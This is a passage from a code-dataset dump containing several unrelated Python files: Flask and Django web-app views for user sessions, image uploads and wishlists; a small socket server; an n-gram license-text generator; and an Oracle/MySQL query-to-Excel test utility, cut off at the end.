redirect(url_for('sessions.index'))\n\n\n@sessions_blueprint.route('/new', methods=['GET'])\n@login_required\ndef new():\n if current_user:\n got_image = Image.select().where(Image.user_id == current_user.id)\n followers = FollowerFollowing.select().where(\n FollowerFollowing.fan == current_user.id)\n following = FollowerFollowing.select().where(\n FollowerFollowing.idol != current_user.id, FollowerFollowing.fan == current_user.id)\n return render_template('sessions/new.html', currentuser_name=current_user.name, got_image=got_image, followers=followers, following=following)\n # if \"user\" in session:\n # user = session['user']\n # return f'

logged in as {user}

'\n # else:\n # return abort()\n # return render_template('403.html')\n # return redirect(url_for('sessions.index'))\n\n\n@sessions_blueprint.route('/user/')\n@login_required\ndef user_profile(id):\n is_followed = FollowerFollowing.get_or_none(\n fan=current_user.id, idol=id)\n followers = FollowerFollowing.select().where(FollowerFollowing.fan == id)\n following = FollowerFollowing.select().where(\n FollowerFollowing.idol != id, FollowerFollowing.fan == id)\n target_prof = User.get_or_none(User.id == id)\n if current_user:\n return render_template('sessions/user.html', target_prof=target_prof, is_followed=is_followed, followers=followers, following=following)\n\n\n@sessions_blueprint.route('//info')\n@login_required\ndef prof_info(id):\n if current_user:\n return render_template('sessions/profinfo.html', id=current_user.id)\n\n\n@sessions_blueprint.route('//update/', methods=['POST'])\n@login_required\ndef email_update(id):\n\n id = current_user.id\n # user = User.get_by_id(id)\n new_email = request.form.get('email_address')\n current_user.email = new_email\n\n query_email = User.get_or_none(User.email == new_email)\n # current_user.email = new_email\n if not query_email and len(new_email) != 0:\n current_user.save()\n flash(\"your email was updated successfully!\", 'success')\n return redirect(url_for('sessions.new'))\n else:\n flash(\n 'Email entered is associated with another account, please try again', 'danger')\n return redirect(url_for('sessions.prof_info', id=current_user.id))\n # if query_email and current_user.id == query_email.id:\n # current_user.email = new_email\n # current_user.save()\n\n\n'''execute way'''\n# mod_email = User(email=new_email).where(User.name == current_user.name)\n# mod_email = User.update(email=new_email).where(\n# User.name == current_user.name)\n\n# try:\n# # breakpoint()\n# mod_email.execute()\n# # mod_email.save()\n# flash('email updated successfully', 'success')\n# return redirect(url_for('sessions.new'))\n# except:\n# flash('something went wrong, try again', 'danger')\n# return redirect(url_for('sessions.prof_info'))\n@sessions_blueprint.route('/google_login')\ndef google_login():\n redirect_uri = url_for('sessions.google_auth', _external=True)\n return oauth.google.authorize_redirect(redirect_uri)\n\n\n@sessions_blueprint.route('/google_auth')\ndef google_auth():\n access_token = oauth.google.authorize_access_token()\n email = oauth.google.get(\n 'https://www.googleapis.com/oauth2/v2/userinfo').json()['email']\n user = User.get_or_none(User.email == email)\n if user:\n login_user(user)\n flash('you are logged in successfully!', 'success')\n return redirect(url_for('sessions.new'))\n else:\n flash('sumting wong', 'danger')\n return redirect(url_for('sessions.index'))\n\n\n@sessions_blueprint.route('/end', methods=['GET'])\ndef logout():\n # session.pop('user', None)\n logout_user()\n flash('successfully logged out', 'success')\n return redirect(url_for('sessions.index'))\n\n\n@sessions_blueprint.route('/upload', methods=['POST'])\n@login_required\ndef profimg_upload():\n file = request.files.get('profile_image')\n if not 'profile_image' in request.files:\n flash('no image has been provided', 'danger')\n return redirect(url_for('sessions.prof_info', id=current_user.id))\n\n if not upload_file_to_s3(file):\n file.filename = secure_filename(file.filename)\n flash('Oops! Something went wrong while uploading', 'warning')\n return redirect(url_for('sessions.prof_info', id=current_user.id))\n\n # else:\n # flash('upload complete')\n # return redirect(url_for('sessions.prof_info', id=current_user.id))\n\n else:\n user = User.get_or_none(User.id == current_user.id)\n user.profile_image = file.filename\n\n user.save()\n\n flash('successfully added profile image!', 'success')\n return redirect(url_for('sessions.prof_info', id=current_user.id))\n\n\n@sessions_blueprint.route('/new/upload', methods=['POST'])\n@login_required\ndef usr_img_upload():\n usr_img = request.files.get('user_image')\n if not 'user_image' in request.files:\n flash('no image has been provided', 'danger')\n return redirect(url_for('sessions.new'))\n\n if not upload_file_to_s3(usr_img):\n file.filename = secure_filename(usr_img.filename)\n flash('Oops! Something went wrong while uploading', 'warning')\n return redirect(url_for('sessions.new'))\n\n else:\n user = User.get_or_none(User.id == current_user.id)\n caption = request.form.get('img_caption')\n user_img = Image(\n user=user.id, user_img=usr_img.filename, caption=caption)\n user_img.save()\n flash('Image successfully uploaded!', 'success')\n return redirect(url_for('sessions.new'))\n","sub_path":"instagram_web/blueprints/sessions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"308665630","text":"from django.shortcuts import render, redirect\nfrom . import models\nfrom django.contrib import messages\n\n# Create your views here.\ndef index(request):\n\treturn render(request, 'mainProjectApp/index.html')\n\ndef newUser(request):\n\tres = models.User.objects.register(request.POST)\n\tmessage = \"registered\"\n\treturn processSignon(request, res, message)\n\ndef signOn(request):\n\tres = models.User.objects.login(request.POST)\n\tmessage = \"logged on\"\n\treturn processSignon(request, res, message)\n\ndef processSignon(request, res, message):\t\n\tif not res[0]:\n\t\tmessages.success(request, \"You have successfully {}!!!!\".format(message))\n\t\trequest.session['id'] = res[1]\n\t\treturn redirect('/success')\n\n\tfor error in res[0]:\n\t\tmessages.warning(request, error)\n\treturn redirect('/')\n\ndef success(request):\n\tif request.session.get('id'):\n\t\tuserWishlistIds =[]\n\t\tuserInfo = models.User.objects.filter(id = request.session['id'])\n\t\tuserWishlist = models.Wishlist.objects.all().filter(user__id = userInfo)\n\t\tfor ids in userWishlist:\n\t\t\tuserWishlistIds.append(ids.item.id)\n\t\titems = models.Item.objects.all().exclude(id__in = userWishlistIds)\n\t\tdata = {\"user\":userInfo[0], \"userWishlist\": userWishlist, \"items\":items}\n\t\treturn render(request, \"mainProjectApp/success.html\", data)\n\treturn redirect('/')\n\ndef add_item(request):\n\tif request.session.get('id'):\n\t\treturn render(request, 'mainProjectApp/add_item.html')\n\treturn redirect('/')\n\ndef add_item_db(request):\n\tresponse = models.Item.objects.add_item_to_db(request.POST, request.session['id'])\n\tif not response:\n\t\tmessages.success(request, \"You have successfully added a item!\")\n\t\treturn redirect('/success')\n\telse:\n\t\tfor error in response:\n\t\t\tmessages.warning(request, error)\n\t\treturn redirect('/add_item')\n\ndef add_to_wishlist(request, id):\n\titem = models.Wishlist.objects.add_to_wishlist(id, request.session['id'])\n\treturn redirect('/success')\n\ndef item_page(request, id):\n\tif request.session.get('id'):\n\t\tusers = models.Wishlist.objects.filter(item__id = id)\n\t\tdata = {\"users\":users, \"item\":users[0].item}\n\t\treturn render(request, 'mainProjectApp/item_page.html', data)\n\treturn redirect('/')\n\n\ndef remove_wishlist(request, id):\n\tmodels.Wishlist.objects.filter(item__id = id, user__id = request.session['id']).delete()\n\treturn redirect('/success')\n\n\ndef delete(request, id):\n\tmodels.Wishlist.objects.filter(item__id= id).delete()\n\tmodels.Item.objects.filter(id= id).delete()\n\treturn redirect('/success')\n\ndef logout(request):\n\trequest.session.clear()\n\treturn redirect('/')","sub_path":"apps/mainProjectApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"23036140","text":"import socket\nimport threading\n\nHOST = '127.0.0.1' # The server's hostname or IP address\nPORT = 4646 # The port used by the server\n\n\n\ntry:\n\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST,PORT))\n s.setblocking(True)\n print('servidor 3 arriba')\n s.listen()\n while True:\n conn,addr=s.accept()\n with conn:\n print('Conectado a ',addr)\n data = conn.recv(1024)\n num = int(data.decode())\n aux =num\n print(data.decode())\n for i in range(39):\n aux=aux*num\n print(str(num)+' elevado a la potencia '+str(i+2)+' = '+str(aux))\n conn.sendall(str(aux).encode())\n s.close()\n\n\nexcept KeyboardInterrupt:\n print('interrupted')","sub_path":"Redes_2/Practica_Seis/Server_3.py","file_name":"Server_3.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"205316067","text":"import ast\r\nimport os\r\nimport string\r\nimport re\r\nimport glob\r\nimport random\r\nfrom pathlib import Path\r\nimport pandas as pd\r\nfrom collections import defaultdict\r\nfrom typing import List\r\nimport intxeger\r\nimport multiprocessing\r\nimport time\r\nimport itertools\r\nimport numpy as np\r\n\r\n\r\ndef main(dictionary,spdxregex,ltregex):\r\n for key in dictionary:\r\n if dictionary[key]==\"\":\r\n continue\r\n \r\n content = dictionary[key]\r\n \r\n para = sum(line.isspace() for line in content) + 1\r\n contents = content.split('\\n\\n')\r\n text = \". \".join(contents)\r\n text = clean_license(text)\r\n reg1 = spdxregex.loc[spdxregex['Licenses'].str.contains(key.split('-').pop(0)),'Regex'].values.tolist()\r\n reg2 = ltregex.loc[ltregex['Licenses'].str.contains(key.split('-').pop(0)),'Regex'].values.tolist()\r\n ab = itertools.chain(reg1,reg2)\r\n regex = list(ab)\r\n regex_list = []\r\n rep = {\"=FEW=\": \".{1,32}\", \"=SOME=\": \".{1,60}\", \"=ANY=\": \".{1,60}\"} \r\n rep = dict((re.escape(k), v) for k, v in rep.items()) \r\n pattern = re.compile(\"|\".join(rep.keys()))\r\n for r in regex:\r\n r = pattern.sub(lambda m: rep[re.escape(m.group(0))], r)\r\n regex_list.append(r)\r\n\r\n regex_list = list(filter(None, regex_list))\r\n\r\n if len(regex_list)==0:\r\n continue\r\n for reg in regex_list:\r\n reg = reg.strip().replace('\"', '')\r\n expansion = []\r\n if \"(.{1,32} (AND|OR)){1,4}\" in reg:\r\n prevsen = reg.split(\"(.{1,32} (AND|OR)){1,4}\")[0]\r\n latersen = reg.split(\"(.{1,32} (AND|OR)){1,4}\")[-1] \r\n for i in range(2,8):\r\n m = create_ngram_model(i,key)\r\n for i in range(1,len(text)):\r\n random.seed(i)\r\n generated_text = m.generate_text(np.random.randint(6,32))\r\n generated_text = clean_license(generated_text)\r\n generated_text = generated_text.lower()\r\n expansion.append(generated_text)\r\n expansion = list(set(expansion))\r\n expansion_ = regex_expansion(prevsen,expansion,latersen)\r\n elif \".{1,32}\" in reg:\r\n prevsen = reg.split(\".{1,32}\")[0]\r\n latersen = reg.split(\".{1,32}\")[-1]\r\n for i in range(2,8):\r\n m = create_ngram_model(i,text)\r\n for i in range(1,len(text)):\r\n random.seed(i)\r\n generated_text = m.generate_text(np.random.randint(6,32))\r\n generated_text = clean_license(generated_text)\r\n generated_text = generated_text.lower()\r\n expansion.append(generated_text)\r\n expansion = list(set(expansion))\r\n expansion_ = regex_expansion(prevsen,expansion,latersen)\r\n elif \".{1,60}\" in reg:\r\n prevsen = reg.split(\"(.{1,60}\")[0]\r\n latersen = reg.split(\"(.{1,60}\")[-1]\r\n for i in range(2,8):\r\n m = create_ngram_model(i,text)\r\n for i in range(1,len(text)):\r\n random.seed(i)\r\n generated_text = m.generate_text(np.random.randint(12,60))\r\n generated_text = clean_license(generated_text)\r\n generated_text = generated_text.lower()\r\n expansion.append(generated_text)\r\n expansion = list(set(expansion))\r\n expansion_ = regex_expansion(prevsen,expansion,latersen)\r\n else:\r\n expansion_ = []\r\n expansion_ = licensestatement_(reg)\r\n \r\n filegen = 0\r\n for i in range(para):\r\n try:\r\n part = str(contents[i])\r\n for ind in range(len(expansion_)):\r\n filegen+=1 \r\n with open(os.path.join('C:/Users/Documents/GSOC21/db','{}-{}.txt'.format(key,filegen)), 'w') as o1:\r\n o1.write(part+\" \"+expansion_[ind])\r\n except:\r\n break\r\n \r\ndef clean_license(text):\r\n license = text\r\n license = re.sub(r'\\w*\\d\\w*', '', license)\r\n license = re.sub(\"[\\n]+\", \"\\n\",license)\r\n license = license.strip()\r\n punctuationNoPeriod = \"[\" + \"(\" + \")\" + \"]\"\r\n license = re.sub(punctuationNoPeriod, \"\", license)\r\n license = license.translate(str.maketrans('', '', string.punctuation))\r\n license = re.sub(r\"\\b[a-zA-Z]\\b\", \"\", license)\r\n license = re.sub(\"[\\s]+\", \" \",license)\r\n license = license.replace('\"', '') \r\n return license\r\n\r\ndef licensestatement_(regex_):\r\n x = intxeger.build(regex_)\r\n res=x.sample(N=1)\r\n result = res\r\n i=2\r\n while True:\r\n try:\r\n result = res\r\n result = list(set(result))\r\n if len(result) >10:\r\n return result \r\n res = x.sample(N=i)\r\n i+=1\r\n except: \r\n break\r\n return result\r\n\r\ndef regex_expansion(prevsen,input_list,latersen):\r\n res_=[]\r\n while(len(res_)<200):\r\n final_regex = \"\"\r\n num = random.randint(1,4)\r\n for i in range(num):\r\n final_regex = final_regex + np.random.choice(input_list)+\" (and|or) \"\r\n fregex_ = prevsen + \" \" + final_regex + \" \" + latersen\r\n ans = licensestatement_(fregex_)\r\n for i in ans:\r\n i = re.sub(\"[\\s]+\", \" \",i)\r\n res_.append(i)\r\n return res_\r\n\r\ndef generate_statements():\r\n for i in range(2,20):\r\n m = create_ngram_model(i,text)\r\n \r\n for i in range(1,len(text)):\r\n random.seed(i)\r\n generated_text = m.generate_text(np.random.randint(6,31))\r\n generated_text = clean_license(generated_text)\r\n generated_text = generated_text.lower()\r\n expansion.append(generated_text)\r\n expansion = list(set(expansion))\r\n\r\ndef tokenize(text: str) -> List[str]:\r\n for punct in string.punctuation:\r\n text = text.replace(punct, ' '+punct+' ')\r\n t = text.split()\r\n return t\r\n\r\ndef get_ngrams(n: int, tokens: list) -> list:\r\n tokens = (n-1)*['']+tokens\r\n l = [(tuple([tokens[i-p-1] for p in reversed(range(n-1))]), tokens[i]) for i in range(n-1, len(tokens))]\r\n return l\r\n\r\n\r\nclass NgramModel(object):\r\n\r\n def __init__(self, n):\r\n self.n = n\r\n self.context = {}\r\n self.ngram_counter = {}\r\n\r\n def update(self, sentence: str) -> None:\r\n n = self.n\r\n ngrams = get_ngrams(n, tokenize(sentence))\r\n for ngram in ngrams:\r\n if ngram in self.ngram_counter:\r\n self.ngram_counter[ngram] += 1.0\r\n else:\r\n self.ngram_counter[ngram] = 1.0\r\n\r\n prev_words, target_word = ngram\r\n if prev_words in self.context:\r\n self.context[prev_words].append(target_word)\r\n else:\r\n self.context[prev_words] = [target_word]\r\n\r\n def prob(self, context, token):\r\n try:\r\n count_of_token = self.ngram_counter[(context, token)]\r\n count_of_context = float(len(self.context[context]))\r\n result = count_of_token / count_of_context\r\n\r\n except KeyError:\r\n result = 0.0\r\n return result\r\n\r\n def random_token(self, context):\r\n r = random.random()\r\n map_to_probs = {}\r\n token_of_interest = self.context[context]\r\n for token in token_of_interest:\r\n map_to_probs[token] = self.prob(context, token)\r\n\r\n summ = 0\r\n for token in sorted(map_to_probs):\r\n summ += map_to_probs[token]\r\n if summ > r:\r\n return token\r\n\r\n def generate_text(self, token_count: int):\r\n n = self.n\r\n context_queue = (n - 1) * ['']\r\n result = []\r\n for _ in range(token_count):\r\n obj = self.random_token(tuple(context_queue))\r\n result.append(obj)\r\n if n > 1:\r\n context_queue.pop(0)\r\n if obj == '.':\r\n context_queue = (n - 1) * ['']\r\n else:\r\n context_queue.append(obj)\r\n return ' '.join(result)\r\n\r\n\r\ndef create_ngram_model(n, text):\r\n m = NgramModel(n)\r\n for sentence in text:\r\n sentence += '.'\r\n m.update(sentence)\r\n return m\r\n\r\nif __name__ == \"__main__\":\r\n with open(\"C:/Users/Documents/GSOC21/extract_header_text/database_licenses.txt\", \"r\") as data:\r\n dictionary = ast.literal_eval(data.read())\r\n\r\n spdxregex = pd.read_csv(\"C:/Users/Documents/Downloads/SPDX_regex.csv\")\r\n ltregex = pd.read_csv(\"C:/Users/Documents/GSOC21/validation_/LT_regex.csv\")\r\n res1 = dict(list(dictionary.items())[:len(dictionary)//3])\r\n res2 = dict(list(dictionary.items())[len(dictionary)//3:(2*len(dictionary)//3)])\r\n res3 = dict(list(dictionary.items())[(2*len(dictionary)//3):])\r\n\r\n list_data = [(res1,spdxregex,ltregex),(res2,spdxregex,ltregex),(res3,spdxregex,ltregex)]\r\n\r\n with multiprocessing.Pool(processes=3) as pool:\r\n pool.starmap(main,list_data)","sub_path":"dbgen.py","file_name":"dbgen.py","file_ext":"py","file_size_in_byte":9376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"198551924","text":"# coding:utf-8\n\n\"\"\"\n作者:azheng\n文件名:db.py\n最近修改:2018年12月26日\n文档描述:\n 编写一个方便访问数据库的类,支持访问Oracle和MySQL\n修改记录:\n 2019年1月25日:\n 1. 新增支持mysql数据库\n\n\"\"\"\n\n__author__ = \"zhangzheng\"\n\nimport os\nimport inspect\nfrom abc import ABC, abstractmethod\nfrom collections import OrderedDict\nfrom typing import Iterable, Union, List, Generator\nimport pyodbc\nimport pymysql\nfrom pymysql.cursors import DictCursor, SSCursor\nimport pandas\nfrom pandas import DataFrame, ExcelWriter\n\nfrom src.config.config import Config\nfrom src.exception.seleniumexecption import SeleniumTypeError\nfrom src.database.compare import Compare\n\n\nclass DataType(object):\n DictCursor = 1 # 元祖包含字典\n SSCursor = 2 # 列表包含元祖\n\n\nclass AbstracDBClass(ABC):\n @abstractmethod\n def __init__(self):\n \"\"\"\n 数据库初始化\n 需要读取对应数据的配置项\n \"\"\"\n\n @abstractmethod\n def _read_config(self):\n \"\"\"\n 数据库初始化前需要先读取配置\n \"\"\"\n\n @abstractmethod\n def _connect(self):\n \"\"\"\n 创建数据库连接\n \"\"\"\n\n @abstractmethod\n def _data_convert_dataframe(self,\n data: Iterable[OrderedDict],\n data_type=DataType.DictCursor) -> DataFrame:\n \"\"\"\n 支持将查询数据转换为pandas.DataFrame类型\n \"\"\"\n if data_type == DataType.DictCursor:\n df = pandas.DataFrame(data)\n else:\n df = None\n return df\n\n @abstractmethod\n def _table_name(self, sql: str) -> str:\n \"\"\"\n 说明:\n 返回当前sql的表名,如果出现连表查询涉及多个表,则默认返回第一个from后面的表名\n :param sql: sql\n :return: 表名\n\n 注意:\n 暂不支持句式如下的sql语句\n SELECT *\n FROM (SELECT A.*,\n NVL((SELECT B.FULL_NAME\n FROM CLIENT B\n WHERE B.CLIENT_ID = A.CLIENT_ID),\n ' ') AS FULL_NAME\n FROM MONITORACCT A) A\n WHERE 1 = 1\n AND TRIM(A.FUND_ACCOUNT) IS NOT NULL\n AND A.VALID_FLAG = '1'\n AND A.IS_LIST_ACCT = '1'\n AND A.BEGIN_DATE < SYSDATE\n AND END_DATE > SYSDATE\n AND A.EXCHANGE_TYPE IN ('1', '2', 'D', 'H');\n\n \"\"\"\n _sql_split_list = str.upper(sql).split()\n _table_name_index = _sql_split_list.index(\"FROM\") + 1\n table_name = _sql_split_list[_table_name_index]\n return table_name.split(\".\")[-1].replace(\";\", \"\") # hs_user.sysarg; SYSARG\n\n @abstractmethod\n def select(self,\n sql: str,\n data_type=DataType.DictCursor) -> Union[Iterable[OrderedDict], List[list], None]:\n \"\"\"\n 说明:\n 支持查询并返回指定数据类型的数据\n\n :param sql: sql\n :param data_type: 指定数据类型\n\n :return: 返回指定数据类型的数据\n \"\"\"\n # TODO: 需要支持多种数据返回类型\n if \"SELECT\" in str.upper(sql): # select查询\n cursor = self.connect.cursor()\n cursor.execute(sql)\n result_columns_gen = [str.upper(column[0]) for column in cursor.description] # 返回查询结果的列名\n result_rows_list = cursor.fetchall() # 返回查询数据\n # 处理不同种数据类型\n if data_type == DataType.DictCursor:\n result = (OrderedDict(zip(result_columns_gen, rows)) for rows in result_rows_list)\n elif data_type == DataType.SSCursor:\n result = result_rows_list\n else:\n result = []\n return result\n else:\n return None\n\n @abstractmethod\n def to_excel(self,\n dataframes: Iterable[DataFrame],\n excel_name: str,\n sheet_names=None,\n index=False) -> None:\n \"\"\"\n 说明:\n 支持将查询数据写入文件\n 将dataframes存入Excel中\n\n :param dataframes: 由dataframe组成的可迭代对象\n :param excel_name: Excel文件路径名\n :param sheet_names: sheet页名\n :param index: 是否写入行号\n\n :return: Excel文件\n \"\"\"\n with ExcelWriter(excel_name) as writer:\n for i, df in enumerate(dataframes):\n if sheet_names:\n df.to_excel(writer, sheet_name=sheet_names[i], index=index)\n else:\n df.to_excel(writer, sheet_name=\"sheet\"+str(i), index=index)\n\n @abstractmethod\n def expectation(self,\n sql: Union[str, Iterable[str]],\n data_type=DataType.DictCursor,\n excel_path=None) -> None:\n \"\"\"\n 说明:\n 通过传入sql语句将数据落地为Excel文件,数据库中的一个表存到Excel为一个sheet页\n 示例:\n ==========================================\n (1):一次查询一个表并落地到Excel中t\n DB().expectation(sql=\"select * from hs_user.excharg;\")\n\n (2):一次查询多个表并落地到Excel中\n DB().expectation(\n sql=[\n \"select * from hs_user.excharg;\",\n \"select * from hs_user.sysarg;\"\n \"select * from hs_user.exchargtime;\"\n ]\n )\n ==========================================\n \"\"\"\n df_list = []\n table_name_list = []\n if isinstance(sql, str):\n _sql = sql\n table_name = self._table_name(sql=_sql)\n result = self.select(sql=_sql, data_type=data_type)\n df = self._data_convert_dataframe(data=result, data_type=data_type)\n df_list.append(df)\n table_name_list.append(table_name)\n elif isinstance(sql, Iterable):\n for _sql in sql:\n table_name = self._table_name(sql=_sql)\n result = self.select(sql=_sql, data_type=data_type)\n df = self._data_convert_dataframe(data=result, data_type=data_type)\n df_list.append(df)\n table_name_list.append(table_name)\n self.to_excel(dataframes=df_list,\n excel_name=excel_path,\n sheet_names=table_name_list)\n\n\nclass OracleDB(AbstracDBClass):\n \"\"\"\n Oracle数据库实例\n \"\"\"\n def __init__(self):\n self._read_config()\n self._connect()\n\n def _read_config(self):\n self.dsn = Config.DSN\n self.username = Config.userName\n self.password = Config.passWord\n\n def _connect(self):\n self.connect = pyodbc.connect(\"DSN=%s;UID=%s;PWD=%s;\" % (self.dsn, self.username, self.password))\n\n def _data_convert_dataframe(self,\n data: Iterable[OrderedDict],\n data_type=DataType.DictCursor) -> DataFrame:\n \"\"\"\n 支持将查询数据转换为pandas.DataFrame类型\n \"\"\"\n return super()._data_convert_dataframe(data=data, data_type=data_type)\n\n def _columns(self,\n table=None,\n schema=None,\n column=None) -> Generator:\n \"\"\"\n 说明:\n 返回表字段相关信息\n :param table: 表名\n :param schema: 用户名\n :param column: 字段名\n :return: 表字段相关信息\n 0) table_cat\n 1) table_schem\n 2) table_name\n 3) column_name\n 4) data_type\n 5) type_name\n 6) column_size\n 7) buffer_length\n 8) decimal_digits\n 9) num_prec_radix\n 10) nullable\n 11) remarks\n 12) column_def\n 13) sql_data_type\n 14) sql_datetime_sub\n 15) char_octet_length\n 16) ordinal_position\n 17) is_nullable\n \"\"\"\n if table: table = str.upper(table)\n if schema: schema = str.upper(schema)\n if column: column = str.upper(column)\n cursor = self.connect.cursor()\n _columns_l = cursor.columns(table=table, schema=schema, column=column).fetchall()\n return ((row[3], row[5]) for row in _columns_l)\n\n def _table_name(self,\n sql: str) -> str:\n \"\"\"\n 说明:\n 返回当前sql的表名,如果出现连表查询涉及多个表,则默认返回第一个from后面的表名\n \"\"\"\n return super()._table_name(sql=sql)\n\n def select(self,\n sql: str,\n data_type=DataType.DictCursor) -> Union[Iterable[OrderedDict], List[list], None]:\n \"\"\"\n 支持查询并返回指定数据类型的数据\n \"\"\"\n return super().select(sql=sql,\n data_type=data_type)\n\n def to_excel(self,\n dataframes: Iterable[DataFrame],\n excel_name: str,\n sheet_names=None,\n index=False) -> None:\n \"\"\"\n 支持将查询数据写入文件\n \"\"\"\n return super().to_excel(dataframes=dataframes,\n excel_name=excel_name,\n sheet_names=sheet_names,\n index=index)\n\n def expectation(self,\n sql: Union[str, Iterable[str]],\n data_type=DataType.DictCursor,\n excel_path=None) -> None:\n \"\"\"\n 支持客户��用该方法将期望查询sql落地成Excel文件\n \"\"\"\n return super().expectation(sql=sql,\n data_type=data_type,\n excel_path=excel_path)\n\n\nclass MySQLDB(AbstracDBClass):\n \"\"\"\n MySQL数据库实例\n \"\"\"\n def __init__(self):\n self._read_config()\n self._connect()\n\n def _read_config(self):\n self.host = Config.host\n self.user = Config.user\n self.passwd = Config.passwd\n self.port = Config.port\n self.charset = Config.charset\n\n def _connect(self):\n self.connect = pymysql.connect(host=self.host,\n user=self.user,\n password=self.passwd,\n port=self.port,\n charset=self.charset)\n\n def _table_name(self,\n sql: str) -> str:\n \"\"\"\n 说明:\n 返回当前sql的表名,如果出现连表查询涉及多个表,则默认返回第一个from后面的表名\n \"\"\"\n return super()._table_name(sql=sql)\n\n def select(self,\n sql: str,\n data_type=DataType.DictCursor) -> Union[Iterable[OrderedDict], List[list], None]:\n return super().select(sql=sql, data_type=data_type)\n\n def _data_convert_dataframe(self,\n data: Iterable[OrderedDict],\n data_type=DataType.DictCursor) -> DataFrame:\n \"\"\"\n 支持将查询数据转换为pandas.DataFrame类型\n \"\"\"\n return super()._data_convert_dataframe(data=data,\n data_type=data_type)\n\n def to_excel(self,\n dataframes: Iterable[DataFrame],\n excel_name: str,\n sheet_names=None,\n index=False) -> None:\n \"\"\"\n 支持将查询数据写入文件\n \"\"\"\n return super().to_excel(dataframes=dataframes,\n excel_name=excel_name,\n sheet_names=sheet_names,\n index=index)\n\n def expectation(self,\n sql: Union[str, Iterable[str]],\n data_type=DataType.DictCursor,\n excel_path=None) -> None:\n \"\"\"\n 支持客户使用该方法将期望查询sql落地成Excel文件\n \"\"\"\n return super().expectation(sql=sql,\n data_type=data_type,\n excel_path=excel_path)\n\n\nclass DB(object):\n def __init__(self, dbtype=\"\"):\n self.db = self._read_config(dbtype=dbtype)\n\n def _read_config(self, dbtype: str):\n \"\"\"\n 先读取config目录下的配置文件,决定实例化哪种数据库类型,例如 Oracle or MySQL。\n :param args:\n :param kwargs:\n 1) dbtype: 数据库类型,当指定类型时优先根据指定类型实例化,否则读取config.ini配置\n 如果config.ini未配置默认为MySQL\n \"\"\"\n supported_dbtypes = {\"ORACLE\", \"MYSQL\"}\n _dbtype = str.upper(dbtype)\n _dbtype_config = str.upper(Config.dbtype)\n\n if _dbtype in supported_dbtypes:\n if _dbtype == \"ORACLE\":\n return OracleDB()\n elif _dbtype == \"MYSQL\":\n return MySQLDB()\n elif _dbtype and (_dbtype not in supported_dbtypes): # 指定dbtype但不在支持数据库范围内\n raise SeleniumTypeError(\"指定数据库不在当前支持范围内,当前支持如下数据库%s\" % supported_dbtypes)\n elif _dbtype_config in supported_dbtypes:\n if _dbtype_config == \"ORACLE\":\n return OracleDB()\n elif _dbtype_config == \"MYSQL\":\n return MySQLDB()\n else: # 未指定dbtype且配置文件不在支持数据库范围内\n raise SeleniumTypeError(\"未指定数据库或指定数据库不在当前支持范围内,当前支持如下数据库%s\" % supported_dbtypes)\n\n # def __new__(cls, *args, **kwargs):\n # \"\"\"\n # 先读取config目录下的配置文件,决定实例化哪种数据库类型,例如 Oracle or MySQL。\n # :param args:\n # :param kwargs:\n # 1) dbtype: 数据库类型,当指定类型时优先根据指定类型实例化,否则读取config.ini配置\n # 如果config.ini未配置默认为MySQL\n # \"\"\"\n # supported_dbtypes = {\"ORACLE\", \"MYSQL\"}\n # _dbtype = str.upper(kwargs.get('dbtype', \"\"))\n # _dbtype_config = str.upper(Config.dbtype)\n #\n # if _dbtype in supported_dbtypes:\n # if _dbtype == \"ORACLE\":\n # return OracleDB()\n # elif _dbtype == \"MYSQL\":\n # return MySQLDB()\n # elif _dbtype and (_dbtype not in supported_dbtypes): # 指定dbtype但不在支持数据库范围内\n # raise SeleniumTypeError(\"指定数据库不在当前支持范围内,当前支持如下数据库%s\" % supported_dbtypes)\n # elif _dbtype_config in supported_dbtypes:\n # if _dbtype_config == \"ORACLE\":\n # return OracleDB()\n # elif _dbtype_config == \"MYSQL\":\n # return MySQLDB()\n # else: # 未指定dbtype且配置文件不在支持数据库范围内\n # raise SeleniumTypeError(\"未指定数据库或指定数据库不在当前支持范围内,当前支持如下数据库%s\" % supported_dbtypes)\n\n def expectation(self,\n sql: Union[str, Iterable[str]],\n data_type=DataType.DictCursor,\n excel_path=None):\n \"\"\"\n 说明:\n 通过传入sql语句将数据落地为Excel文件,数据库中的一个表存到Excel为一个sheet页\n \"\"\"\n if excel_path is None:\n excel_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"【Test】_【实际结果】.xlsx\")\n self.db.expectation(sql=sql,\n data_type=data_type,\n excel_path=excel_path)\n\n\ndef test_dbcheck(sql: Union[str, Iterable[str]]):\n def decorator(func):\n co_varnames = tuple(inspect.signature(func).parameters) # 获取func函数的形参\n def warpper(*arg, **kwargs):\n func(*arg, **kwargs)\n _check_result = False\n try:\n IS_TEST_FUNC = (\"test\" in str(arg[0].__class__)) and (co_varnames[0] == \"self\")\n except IndexError:\n raise SeleniumTypeError(\"装饰器@test_dbcheck请使用在测试案例方法上 'def test_*(self, ): '。\")\n if IS_TEST_FUNC: # 表示第一个参数是对象测试用例方法“test_*”\n self = arg[0]\n _check_result = dbcheck(self=self, sql=sql)\n else:\n raise SeleniumTypeError(\"装饰器@test_dbcheck请使用在测试案例方法上 'def test_*(self, ): '。\")\n if not _check_result:\n self.assertEqual(\"\", sql, msg=\"数据比对失败,请查看比对结果文件\")\n return warpper\n return decorator\n\n\ndef dbcheck(self, sql: Union[str, Iterable[str]]) -> bool:\n \"\"\"\n 说明:\n 执行数据比对\n\n :param sql: 需要比对的sql语句\n\n :return: True or False \n \"\"\"\n except_path, actual_path = _get_compare_filename(self=self)\n except_exist = os.path.exists(except_path)\n if not except_exist:\n DB().expectation(sql=sql,\n excel_path=actual_path,)\n return False\n else: # 存在期望结果则开始比较\n DB().expectation(sql=sql,\n excel_path=actual_path,)\n return Compare(expected=except_path, actual=actual_path).compare()\n\n\ndef _get_compare_filename(self):\n _module = self.__module__\n _module = _module.replace(\".\", \"\\\\\")\n case_filename = os.path.realpath(_module + \".py\")\n _dir = os.path.dirname(case_filename) # case案例所在目录\n _name = 